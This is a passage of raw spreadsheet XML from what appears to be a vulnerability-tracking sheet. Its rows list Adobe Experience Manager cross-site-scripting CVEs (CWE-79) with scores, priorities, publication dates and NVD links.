s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1372" s="5" t="inlineStr"><is><t>CVE-2026-75637</t></is></c><c r="D1372" s="5" t="n"><v>5.4</v></c><c r="E1372" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1372" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1372" s="5" t="inlineStr" /><c r="H1372" s="5" t="n"><v>0.003</v></c><c r="I1372" s="5" t="inlineStr" /><c r="J1372" s="5" t="inlineStr" /><c r="K1372" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1372" s="5" t="inlineStr" /><c r="M1372" s="5" t="inlineStr" /><c r="N1372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1372" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1372" s="5" t="inlineStr" /><c r="R1372" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t></is></c></row><row r="1373"><c r="A1373" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1373" s="5" t="inlineStr"><is><t>CVE-2026-75639</t></is></c><c r="D1373" s="5" t="n"><v>5.4</v></c><c r="E1373" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1373" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1373" s="5" t="inlineStr" /><c r="H1373" s="5" t="n"><v>0.002</v></c><c r="I1373" s="5" t="inlineStr" /><c r="J1373" s="5" t="inlineStr" /><c r="K1373" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1373" s="5" t="inlineStr" /><c r="M1373" s="5" t="inlineStr" /><c r="N1373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1373" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1373" s="5" t="inlineStr" /><c r="R1373" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t></is></c></row><row r="1374"><c r="A1374" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1374" s="5" t="inlineStr"><is><t>CVE-2026-75640</t></is></c><c r="D1374" s="5" t="n"><v>5.4</v></c><c r="E1374" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1374" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1374" s="5" t="inlineStr" /><c r="H1374" s="5" t="n"><v>0.002</v></c><c r="I1374" s="5" t="inlineStr" /><c r="J1374" s="5" t="inlineStr" /><c r="K1374" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1374" s="5" t="inlineStr" /><c r="M1374" s="5" t="inlineStr" /><c r="N1374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1374" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1374" s="5" t="inlineStr" /><c r="R1374" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t></is></c></row><row r="1375"><c r="A1375" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1375" s="5" t="inlineStr"><is><t>CVE-2026-75642</t></is></c><c r="D1375" s="5" t="n"><v>5.4</v></c><c r="E1375" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1375" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1375" s="5" t="inlineStr" /><c r="H1375" s="5" t="n"><v>0.002</v></c><c r="I1375" s="5" t="inlineStr" /><c r="J1375" s="5" t="inlineStr" /><c r="K1375" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1375" s="5" t="inlineStr" /><c r="M1375" s="5" t="inlineStr" /><c r="N1375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1375" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1375" s="5" t="inlineStr" /><c r="R1375" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t></is></c></row><row r="1376"><c r="A1376" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1376" s="5" t="inlineStr"><is><t>CVE-2026-75643</t></is></c><c r="D1376" s="5" t="n"><v>5.4</v></c><c r="E1376" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1376" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1376" s="5" t="inlineStr" /><c r="H1376" s="5" t="n"><v>0.002</v></c><c r="I1376" s="5" t="inlineStr" /><c r="J1376" s="5" t="inlineStr" /><c r="K1376" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1376" s="5" t="inlineStr" /><c r="M1376" s="5" t="inlineStr" /><c r="N1376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1376" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1376" s="5" t="inlineStr" /><c r="R1376" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t></is></c></row><row r="1377"><c r="A1377" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1377" s="5" t="inlineStr"><is><t>CVE-2026-75644</t></is></c><c r="D1377" s="5" t="n"><v>5.4</v></c><c r="E1377" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1377" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1377" s="5" t="inlineStr" /><c r="H1377" s="5" t="n"><v>0.002</v></c><c r="I1377" s="5" t="inlineStr" /><c r="J1377" s="5" t="inlineStr" /><c r="K1377" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1377" s="5" t="inlineStr" /><c r="M1377" s="5" t="inlineStr" /><c r="N1377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1377" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1377" s="5" t="inlineStr" /><c r="R1377" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t></is></c></row><row r="1378"><c r="A1378" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1378" s="5" t="inlineStr"><is><t>CVE-2026-75646</t></is></c><c r="D1378" s="5" t="n"><v>5.4</v></c><c r="E1378" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1378" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1378" s="5" t="inlineStr" /><c r="H1378" s="5" t="n"><v>0.002</v></c><c r="I1378" s="5" t="inlineStr" /><c r="J1378" s="5" t="inlineStr" /><c r="K1378" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1378" s="5" t="inlineStr" /><c r="M1378" s="5" t="inlineStr" /><c r="N1378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1378" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1378" s="5" t="inlineStr" /><c r="R1378" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t></is></c></row><row r="1379"><c r="A1379" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1379" s="5" t="inlineStr"><is><t>CVE-2026-75647</t></is></c><c r="D1379" s="5" t="n"><v>5.4</v></c><c r="E1379" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1379" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1379" s="5" t="inlineStr" /><c r="H1379" s="5" t="n"><v>0.002</v></c><c r="I1379" s="5" t="inlineStr" /><c r="J1379" s="5" t="inlineStr" /><c r="K1379" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1379" s="5" t="inlineStr" /><c r="M1379" s="5" t="inlineStr" /><c r="N1379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1379" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1379" s="5" t="inlineStr" /><c r="R1379" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S137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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75647</t></is></c></row><row r="1380"><c r="A1380" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1380" s="5" t="inlineStr"><is><t>CVE-2026-75651</t></is></c><c r="D1380" s="5" t="n"><v>5.4</v></c><c r="E1380" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1380" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1380" s="5" t="inlineStr" /><c r="H1380" s="5" t="n"><v>0.002</v></c><c r="I1380" s="5" t="inlineStr" /><c r="J1380" s="5" t="inlineStr" /><c r="K1380" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1380" s="5" t="inlineStr" /><c r="M1380" s="5" t="inlineStr" /><c r="N1380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1380" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1380" s="5" t="inlineStr" /><c r="R1380" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75651</t></is></c></row><row r="1381"><c r="A1381" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1381" s="5" t="inlineStr"><is><t>CVE-2026-75652</t></is></c><c r="D1381" s="5" t="n"><v>5.4</v></c><c r="E1381" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1381" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1381" s="5" t="inlineStr" /><c r="H1381" s="5" t="n"><v>0.002</v></c><c r="I1381" s="5" t="inlineStr" /><c r="J1381" s="5" t="inlineStr" /><c r="K1381" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1381" s="5" t="inlineStr" /><c r="M1381" s="5" t="inlineStr" /><c r="N1381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1381" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1381" s="5" t="inlineStr" /><c r="R1381" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75652</t></is></c></row><row r="1382"><c r="A1382" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1382" s="5" t="inlineStr"><is><t>CVE-2026-75657</t></is></c><c r="D1382" s="5" t="n"><v>5.4</v></c><c r="E1382" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1382" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1382" s="5" t="inlineStr" /><c r="H1382" s="5" t="n"><v>0.002</v></c><c r="I1382" s="5" t="inlineStr" /><c r="J1382" s="5" t="inlineStr" /><c r="K1382" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1382" s="5" t="inlineStr" /><c r="M1382" s="5" t="inlineStr" /><c r="N1382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1382" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1382" s="5" t="inlineStr" /><c r="R1382" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t></is></c></row><row r="1383"><c r="A1383" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1383" s="5" t="inlineStr"><is><t>CVE-2026-75659</t></is></c><c r="D1383" s="5" t="n"><v>5.4</v></c><c r="E1383" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1383" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1383" s="5" t="inlineStr" /><c r="H1383" s="5" t="n"><v>0.002</v></c><c r="I1383" s="5" t="inlineStr" /><c r="J1383" s="5" t="inlineStr" /><c r="K1383" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1383" s="5" t="inlineStr" /><c r="M1383" s="5" t="inlineStr" /><c r="N1383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1383" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1383" s="5" t="inlineStr" /><c r="R1383" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t></is></c></row><row r="1384"><c r="A1384" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1384" s="5" t="inlineStr"><is><t>CVE-2026-75660</t></is></c><c r="D1384" s="5" t="n"><v>5.4</v></c><c r="E1384" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1384" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1384" s="5" t="inlineStr" /><c r="H1384" s="5" t="n"><v>0.002</v></c><c r="I1384" s="5" t="inlineStr" /><c r="J1384" s="5" t="inlineStr" /><c r="K1384" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1384" s="5" t="inlineStr" /><c r="M1384" s="5" t="inlineStr" /><c r="N1384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1384" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1384" s="5" t="inlineStr" /><c r="R1384" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t></is></c></row><row r="1385"><c r="A1385" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1385" s="5" t="inlineStr"><is><t>CVE-2026-75661</t></is></c><c r="D1385" s="5" t="n"><v>5.4</v></c><c r="E1385" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1385" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1385" s="5" t="inlineStr" /><c r="H1385" s="5" t="n"><v>0.003</v></c><c r="I1385" s="5" t="inlineStr" /><c r="J1385" s="5" t="inlineStr" /><c r="K1385" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1385" s="5" t="inlineStr" /><c r="M1385" s="5" t="inlineStr" /><c r="N1385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1385" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1385" s="5" t="inlineStr" /><c r="R1385" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t></is></c></row><row r="1386"><c r="A1386" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1386" s="5" t="inlineStr"><is><t>CVE-2026-75666</t></is></c><c r="D1386" s="5" t="n"><v>5.4</v></c><c r="E1386" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1386" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1386" s="5" t="inlineStr" /><c r="H1386" s="5" t="n"><v>0.003</v></c><c r="I1386" s="5" t="inlineStr" /><c r="J1386" s="5" t="inlineStr" /><c r="K1386" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1386" s="5" t="inlineStr" /><c r="M1386" s="5" t="inlineStr" /><c r="N1386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1386" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1386" s="5" t="inlineStr" /><c r="R1386" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t></is></c></row><row r="1387"><c r="A1387" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1387" s="5" t="inlineStr"><is><t>CVE-2026-75667</t></is></c><c r="D1387" s="5" t="n"><v>5.4</v></c><c r="E1387" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1387" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1387" s="5" t="inlineStr" /><c r="H1387" s="5" t="n"><v>0.003</v></c><c r="I1387" s="5" t="inlineStr" /><c r="J1387" s="5" t="inlineStr" /><c r="K1387" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1387" s="5" t="inlineStr" /><c r="M1387" s="5" t="inlineStr" /><c r="N1387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1387" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1387" s="5" t="inlineStr" /><c r="R1387" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t></is></c></row><row r="1388"><c r="A1388" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1388" s="5" t="inlineStr"><is><t>CVE-2026-75668</t></is></c><c r="D1388" s="5" t="n"><v>5.4</v></c><c r="E1388" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1388" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1388" s="5" t="inlineStr" /><c r="H1388" s="5" t="n"><v>0.003</v></c><c r="I1388" s="5" t="inlineStr" /><c r="J1388" s="5" t="inlineStr" /><c r="K1388" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1388" s="5" t="inlineStr" /><c r="M1388" s="5" t="inlineStr" /><c r="N1388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1388" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1388" s="5" t="inlineStr" /><c r="R1388" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t></is></c></row><row r="1389"><c r="A1389" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1389" s="5" t="inlineStr"><is><t>CVE-2026-75669</t></is></c><c r="D1389" s="5" t="n"><v>5.4</v></c><c r="E1389" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1389" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1389" s="5" t="inlineStr" /><c r="H1389" s="5" t="n"><v>0.003</v></c><c r="I1389" s="5" t="inlineStr" /><c r="J1389" s="5" t="inlineStr" /><c r="K1389" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1389" s="5" t="inlineStr" /><c r="M1389" s="5" t="inlineStr" /><c r="N1389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1389" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1389" s="5" t="inlineStr" /><c r="R1389" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t></is></c></row><row r="1390"><c r="A1390" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1390" s="5" t="inlineStr"><is><t>CVE-2026-75670</t></is></c><c r="D1390" s="5" t="n"><v>5.4</v></c><c r="E1390" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1390" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1390" s="5" t="inlineStr" /><c r="H1390" s="5" t="n"><v>0.003</v></c><c r="I1390" s="5" t="inlineStr" /><c r="J1390" s="5" t="inlineStr" /><c r="K1390" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1390" s="5" t="inlineStr" /><c r="M1390" s="5" t="inlineStr" /><c r="N1390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1390" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1390" s="5" t="inlineStr" /><c r="R1390" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t></is></c></row><row r="1391"><c r="A1391" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1391" s="5" t="inlineStr"><is><t>CVE-2026-75671</t></is></c><c r="D1391" s="5" t="n"><v>5.4</v></c><c r="E1391" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1391" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1391" s="5" t="inlineStr" /><c r="H1391" s="5" t="n"><v>0.003</v></c><c r="I1391" s="5" t="inlineStr" /><c r="J1391" s="5" t="inlineStr" /><c r="K1391" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1391" s="5" t="inlineStr" /><c r="M1391" s="5" t="inlineStr" /><c r="N1391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1391" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1391" s="5" t="inlineStr" /><c r="R1391" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t></is></c></row><row r="1392"><c r="A1392" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1392" s="5" t="inlineStr"><is><t>CVE-2026-75672</t></is></c><c r="D1392" s="5" t="n"><v>5.4</v></c><c r="E1392" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1392" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1392" s="5" t="inlineStr" /><c r="H1392" s="5" t="n"><v>0.003</v></c><c r="I1392" s="5" t="inlineStr" /><c r="J1392" s="5" t="inlineStr" /><c r="K1392" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1392" s="5" t="inlineStr" /><c r="M1392" s="5" t="inlineStr" /><c r="N1392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1392" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1392" s="5" t="inlineStr" /><c r="R1392" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t></is></c></row><row r="1393"><c r="A1393" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1393" s="5" t="inlineStr"><is><t>CVE-2026-75674</t></is></c><c r="D1393" s="5" t="n"><v>5.4</v></c><c r="E1393" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1393" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1393" s="5" t="inlineStr" /><c r="H1393" s="5" t="n"><v>0.003</v></c><c r="I1393" s="5" t="inlineStr" /><c r="J1393" s="5" t="inlineStr" /><c r="K1393" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1393" s="5" t="inlineStr" /><c r="M1393" s="5" t="inlineStr" /><c r="N1393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1393" s="5" t="inlineStr" /><c r="R1393" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t></is></c></row><row r="1394"><c r="A1394" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1394" s="5" t="inlineStr"><is><t>CVE-2026-75675</t></is></c><c r="D1394" s="5" t="n"><v>5.4</v></c><c r="E1394" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1394" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1394" s="5" t="inlineStr" /><c r="H1394" s="5" t="n"><v>0.003</v></c><c r="I1394" s="5" t="inlineStr" /><c r="J1394" s="5" t="inlineStr" /><c r="K1394" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1394" s="5" t="inlineStr" /><c r="M1394" s="5" t="inlineStr" /><c r="N1394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1394" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1394" s="5" t="inlineStr" /><c r="R1394" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t></is></c></row><row r="1395"><c r="A1395" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1395" s="5" t="inlineStr"><is><t>CVE-2026-75677</t></is></c><c r="D1395" s="5" t="n"><v>5.4</v></c><c r="E1395" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1395" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1395" s="5" t="inlineStr" /><c r="H1395" s="5" t="n"><v>0.003</v></c><c r="I1395" s="5" t="inlineStr" /><c r="J1395" s="5" t="inlineStr" /><c r="K1395" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1395" s="5" t="inlineStr" /><c r="M1395" s="5" t="inlineStr" /><c r="N1395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1395" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1395" s="5" t="inlineStr" /><c r="R1395" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t></is></c></row><row r="1396"><c r="A1396" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1396" s="5" 